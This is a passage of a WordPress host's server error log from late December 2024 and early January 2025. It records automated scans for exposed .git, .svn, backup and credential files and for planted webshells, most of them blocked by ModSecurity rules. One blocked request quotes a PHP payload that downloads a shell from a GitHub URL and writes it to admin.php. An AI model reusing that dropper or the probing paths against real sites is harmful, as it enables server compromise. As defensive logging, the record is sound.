webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/12/29 00:44:02 [error] 12050#12050: *95944 access forbidden by rule, client: 139.59.132.8, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sun Dec 29 03:14:15.785505 2024] [ssl:warn] [pid 26764:tid 140051196553088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Dec 29 03:14:15.984912 2024] [ssl:warn] [pid 26765:tid 140051196553088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Dec 29 03:14:16.402659 2024] [ssl:warn] [pid 26765:tid 140051196553088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Dec 29 03:14:18.612881 2024] [ssl:warn] [pid 26765:tid 140051196553088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Dec 29 03:14:20.880005 2024] [ssl:warn] [pid 27181:tid 140104151578496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Dec 29 03:14:21.090665 2024] [ssl:warn] [pid 27182:tid 140104151578496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/12/29 03:26:20 [error] 27066#27066: *98637 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/29 04:11:33 [error] 27065#27065: *99064 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/12/29 04:15:06 [error] 27066#27066: *99105 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/29 04:27:17 [error] 27066#27066: *99172 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/12/29 07:10:36 [error] 27066#27066: *100378 access forbidden by rule, client: 18.170.111.113, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Dec 29 10:05:52.957677 2024] [:error] [pid 28058:tid 140103838066432] [client 3.142.84.104:50920] [client 3.142.84.104] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/s3cmd.ini"] [unique_id "Z3FlUDDfxfP87FK_9aF24AAAAMc"] 2024/12/29 11:12:42 [error] 27066#27066: *102397 access forbidden by rule, client: 213.232.87.230, server: webmail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2024/12/29 11:12:43 [error] 27066#27066: *102456 access forbidden by rule, client: 213.232.87.230, server: webmail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "webmail.investigacionperu.com" [Sun Dec 29 12:46:51.169054 2024] [:error] [pid 6013:tid 140103796102912] [client 164.152.20.174:53442] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Dec 29 12:47:05.061351 2024] [:error] [pid 6013:tid 140103754139392] [client 164.152.20.174:53488] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Dec 29 12:47:05.092354 2024] [:error] [pid 6013:tid 140103838066432] [client 164.152.20.174:53490] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Dec 29 12:47:41.215359 2024] [autoindex:error] [pid 27206:tid 140103754139392] [client 164.152.20.174:53588] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 29 12:47:48.986264 2024] [:error] [pid 27206:tid 140103737353984] [client 164.152.20.174:53612] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Dec 29 12:47:49.713507 2024] [autoindex:error] [pid 27206:tid 140103720568576] [client 164.152.20.174:53616] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 29 12:47:50.595798 2024] [autoindex:error] [pid 27206:tid 140103935260416] [client 164.152.20.174:53620] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 29 12:47:56.929331 2024] [:error] [pid 27205:tid 140103720568576] [client 164.152.20.174:53640] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Dec 29 12:47:56.996038 2024] [:error] [pid 27204:tid 140103762532096] [client 164.152.20.174:53642] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Dec 29 12:48:43.782985 2024] [:error] [pid 28058:tid 140103968831232] [client 164.152.20.174:53806] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Dec 29 12:48:56.346769 2024] [:error] [pid 27204:tid 140103745746688] [client 164.152.20.174:53844] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Dec 29 12:48:56.369277 2024] [:error] [pid 27204:tid 140103846459136] [client 164.152.20.174:53846] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Dec 29 12:49:34.578448 2024] [autoindex:error] [pid 28058:tid 140103935260416] [client 164.152.20.174:53954] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 29 12:49:44.176774 2024] [:error] [pid 6013:tid 140103968831232] [client 164.152.20.174:53990] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Dec 29 12:49:44.880992 2024] [autoindex:error] [pid 6013:tid 140103821281024] [client 164.152.20.174:53994] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 29 12:49:45.620125 2024] [autoindex:error] [pid 6013:tid 140103770924800] [client 164.152.20.174:53998] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 29 12:49:50.939215 2024] [:error] [pid 6013:tid 140103787710208] [client 164.152.20.174:54018] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Dec 29 12:49:50.960921 2024] [:error] [pid 28058:tid 140103737353984] [client 164.152.20.174:54020] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Dec 29 17:44:23.718388 2024] [:error] [pid 28058:tid 140103960438528] [client 52.53.162.142:59110] [client 52.53.162.142] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: '<title>-= Team Anon Force =-</title>'; file_put_contents('admin.php', file_get_contents('https://raw.githubusercontent.com/Professor6T9/shell/refs/heads/main/s.txt') found within ARGS:x: echo '<title>-= Team Anon Force =-</title>'; file_put_contents('admin.php', file_get_contents('https://raw.githubusercontent.com/Professor6T9/shell/refs/heads/main/s.txt'));"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp.php"] [unique_id "Z3HQxzDfxfP87FK_9aF4yQAAAME"], referer: http://investigacionperu.com [Sun Dec 29 23:36:41.900218 2024] [authz_core:error] [pid 28058:tid 140103728961280] [client 167.172.158.128:38296] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/29 23:36:45 [error] 27066#27066: *112607 access forbidden by rule, client: 167.172.158.128, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Dec 30 03:25:44.491170 2024] [ssl:warn] [pid 7121:tid 140130853566336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Dec 30 03:25:44.785202 2024] [ssl:warn] [pid 7122:tid 140130853566336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Dec 30 03:25:45.344243 2024] [ssl:warn] [pid 7122:tid 140130853566336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Dec 30 03:25:47.983161 2024] [ssl:warn] [pid 7122:tid 140130853566336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Dec 30 03:25:50.324257 2024] [ssl:warn] [pid 7538:tid 139767576233856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Dec 30 03:25:50.545984 2024] [ssl:warn] [pid 7539:tid 139767576233856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Dec 30 06:05:24.951947 2024] [authz_core:error] [pid 8136:tid 139767144437504] [client 167.71.81.114:45666] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/30 06:05:28 [error] 7519#7519: *117293 access forbidden by rule, client: 167.71.81.114, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Dec 30 10:41:23.022296 2024] [autoindex:error] [pid 8136:tid 139767152830208] [client 194.233.95.188:53128] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Mon Dec 30 10:41:45.422342 2024] [:error] [pid 7556:tid 139767261935360] [client 194.233.95.188:53274] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Mon Dec 30 10:42:51.183716 2024] [autoindex:error] [pid 8136:tid 139767152830208] [client 194.233.95.188:53614] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Mon Dec 30 10:43:29.577466 2024] [autoindex:error] [pid 8136:tid 139767119259392] [client 194.233.95.188:53810] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Dec 30 10:43:39.822185 2024] [autoindex:error] [pid 7557:tid 139767119259392] [client 194.233.95.188:53862] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Mon Dec 30 10:43:45.986550 2024] [autoindex:error] [pid 8136:tid 139767270328064] [client 194.233.95.188:53898] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Mon Dec 30 10:43:49.513548 2024] [autoindex:error] [pid 7558:tid 139767178008320] [client 194.233.95.188:53918] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Mon Dec 30 10:43:49.739886 2024] [:error] [pid 8136:tid 139767376701184] [client 194.233.95.188:53922] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Dec 30 10:43:54.726131 2024] [autoindex:error] [pid 8136:tid 139767169615616] [client 194.233.95.188:53950] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Mon Dec 30 10:44:27.604466 2024] [autoindex:error] [pid 8136:tid 139767203186432] [client 194.233.95.188:54108] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Mon Dec 30 10:44:34.207880 2024] [autoindex:error] [pid 8136:tid 139767203186432] [client 194.233.95.188:54136] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Mon Dec 30 10:45:06.230341 2024] [autoindex:error] [pid 8136:tid 139767270328064] [client 194.233.95.188:54314] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Mon Dec 30 10:45:06.463735 2024] [:error] [pid 8136:tid 139767376701184] [client 194.233.95.188:54316] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Mon Dec 30 10:45:37.219708 2024] [autoindex:error] [pid 8136:tid 139767245149952] [client 194.233.95.188:54456] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Mon Dec 30 10:45:47.776191 2024] [:error] [pid 8136:tid 139767169615616] [client 194.233.95.188:54512] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Mon Dec 30 10:45:55.086125 2024] [autoindex:error] [pid 8136:tid 139767152830208] [client 194.233.95.188:54560] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Mon Dec 30 21:32:36.330753 2024] [autoindex:error] [pid 8136:tid 139767144437504] [client 4.213.67.230:37698] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Dec 30 22:27:08.364904 2024] [:error] [pid 7558:tid 139767194793728] [client 193.41.206.36:38472] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Z3NkjGpE3yKTNEUSwJQcbAAAAI8"] 2024/12/31 01:57:10 [error] 7519#7519: *132641 access forbidden by rule, client: 18.170.111.113, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Dec 31 03:18:36.774774 2024] [ssl:warn] [pid 10276:tid 139685187794816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Dec 31 03:18:36.990598 2024] [ssl:warn] [pid 10277:tid 139685187794816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Dec 31 03:18:37.456039 2024] [ssl:warn] [pid 10277:tid 139685187794816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Dec 31 03:18:39.573592 2024] [ssl:warn] [pid 10277:tid 139685187794816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Dec 31 03:18:41.866500 2024] [ssl:warn] [pid 10695:tid 139914073683840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Dec 31 03:18:42.072999 2024] [ssl:warn] [pid 10696:tid 139914073683840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Dec 31 05:31:58.292481 2024] [autoindex:error] [pid 10714:tid 139913651480320] [client 104.131.87.186:46282] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Dec 31 11:42:43.425910 2024] [autoindex:error] [pid 10713:tid 139913777370880] [client 178.128.53.138:51490] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 31 15:26:25.782009 2024] [:error] [pid 11327:tid 139913710229248] [client 150.136.222.122:56156] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Dec 31 15:26:38.718369 2024] [:error] [pid 11327:tid 139913643087616] [client 150.136.222.122:56190] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Dec 31 15:26:38.727598 2024] [:error] [pid 10713:tid 139913626302208] [client 150.136.222.122:56192] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Dec 31 15:27:19.269059 2024] [autoindex:error] [pid 10715:tid 139913643087616] [client 150.136.222.122:56302] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 31 15:27:28.154924 2024] [:error] [pid 10714:tid 139913743800064] [client 150.136.222.122:56328] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Dec 31 15:27:28.996536 2024] [autoindex:error] [pid 10713:tid 139913693443840] [client 150.136.222.122:56332] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 31 15:27:29.933343 2024] [autoindex:error] [pid 11327:tid 139913777370880] [client 150.136.222.122:56336] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 31 15:27:35.810756 2024] [:error] [pid 10715:tid 139913727014656] [client 150.136.222.122:56350] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Dec 31 15:27:35.820302 2024] [:error] [pid 10715:tid 139913693443840] [client 150.136.222.122:56352] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Dec 31 15:28:25.342186 2024] [:error] [pid 10715:tid 139913785763584] [client 150.136.222.122:56474] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Dec 31 15:28:38.773471 2024] [:error] [pid 11327:tid 139913718621952] [client 150.136.222.122:56508] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Dec 31 15:28:38.790754 2024] [:error] [pid 10713:tid 139913634694912] [client 150.136.222.122:56510] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Dec 31 15:29:21.168301 2024] [autoindex:error] [pid 11327:tid 139913659873024] [client 150.136.222.122:56618] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 31 15:29:31.075843 2024] [:error] [pid 10715:tid 139913651480320] [client 150.136.222.122:56644] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Dec 31 15:29:31.853927 2024] [autoindex:error] [pid 10715:tid 139913668265728] [client 150.136.222.122:56648] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 31 15:29:32.641698 2024] [autoindex:error] [pid 11327:tid 139913710229248] [client 150.136.222.122:56652] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 31 15:29:37.840175 2024] [:error] [pid 10713:tid 139913735407360] [client 150.136.222.122:56666] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Dec 31 15:29:37.849425 2024] [:error] [pid 11327:tid 139913643087616] [client 150.136.222.122:56668] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Jan 01 02:37:14.421461 2025] [authz_core:error] [pid 11327:tid 139913727014656] [client 139.59.136.184:52194] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/01 02:37:19 [error] 10591#10591: *184367 access forbidden by rule, client: 139.59.136.184, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/01/01 03:49:47 [error] 10591#10591: *187941 connect() failed (111: Connection refused) while connecting to upstream, client: 178.128.119.235, server: investigacionperu.com, request: "POST //xmlrpc.php HTTP/1.1", upstream: "http://198.199.72.26:8181//xmlrpc.php", host: "investigacionperu.com" [Wed Jan 01 03:49:48.915580 2025] [ssl:warn] [pid 3394:tid 140439761868672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 01 03:49:49.208520 2025] [ssl:warn] [pid 